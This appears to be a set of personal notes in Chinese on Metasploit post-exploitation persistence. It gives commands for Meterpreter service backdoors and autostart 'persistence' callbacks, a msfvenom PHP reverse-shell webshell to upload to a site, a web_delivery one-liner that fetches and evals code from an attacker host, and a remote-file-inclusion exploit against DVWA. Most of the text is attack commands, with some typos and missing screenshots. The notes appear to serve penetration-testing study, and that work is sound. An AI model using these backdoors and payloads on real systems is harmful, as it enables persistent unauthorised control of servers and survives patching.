持久后门

  • 利用漏洞取得的meterpreter shell 运行于内存中,重启失效。
  • 重复explpoit漏洞可能造成服务器崩溃
  • 持久后门保证漏洞修复后仍可远程控制

    Meterpreter后门

    1. run metsvc -A #删除 -r
    2. sue exploit/multi/handler
    3. set PAYLOAD windows/metsvc_bind_tcp
    4. set LPORT 31337
    5. set RHOST 1.1.1.1

    持久后门

    ```powershell run persistence -h run persistence -X -i 10 -p 4444 -r 1.1.1.1 #-i参数为方向连接间隔 -X表示选择开机自启动。 run persistence -U -i 20 -p 4444 -r 1.1.1.1 #-p 表示主机侦听连接的端口
    run persistence -S -i 20 -p 4444 -r 1.1.1.1 # -r 是连接应连接回的主机 IP 地址
  1. <a name="F6jML"></a>
  2. ### PHP shell
  3. ```powershell
  4. msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f
  5. raw -o a.php
  6. MSF 启动侦听
  7. 上传到web站点并通过浏览器访问

Web Delivery

利用代码执行漏洞访问攻击者服务器
use exploit/multi/script/web_delivery
set target 1
php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/
fTYWqmu'));"

RFI远程文件包含

vi /etc/php5/cgi/php.ini #php info 
▪ allow_url_fopen = On
▪ allow_url_include = On
use exploit/unix/webapp/php_include
set RHOST 1.1.1.2
set PATH /dvwa/vulnerabilities/fi/–
set PHPURI /?page=XXpathXX
set HEADERS "Cookie:security=low; 
PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
set payload php/meterpreter/reverse_tcp
set lhost 1.1.1.1
exploi

屏幕截图 2022-05-31 175237.png屏幕截图 2022-05-31 175254.png屏幕截图 2022-05-31 175305.png屏幕截图 2022-05-31 175316.png